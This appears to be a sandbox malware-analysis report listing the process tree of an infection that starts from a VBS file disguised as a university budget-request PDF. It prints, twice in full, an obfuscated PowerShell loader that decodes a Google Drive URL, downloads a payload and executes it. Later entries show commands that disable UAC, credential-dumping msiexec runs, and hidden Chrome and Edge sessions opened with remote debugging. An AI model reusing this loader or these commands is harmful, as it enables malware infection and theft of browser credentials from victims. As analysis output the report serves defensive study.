PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 2560 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 2560 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 1468 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa39fbcc40,0x7ffa39fbcc4c,0x7ffa39fbcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\euyomxdaaormfgjg"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pwdgnpncowjzhvfkrmd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zqjzohyvkebesbtoaxpegvp"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2072,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1960,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2432 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,10133741753181523538,17486332801899806897,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa39e746f8,0x7ffa39e74708,0x7ffa39e74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

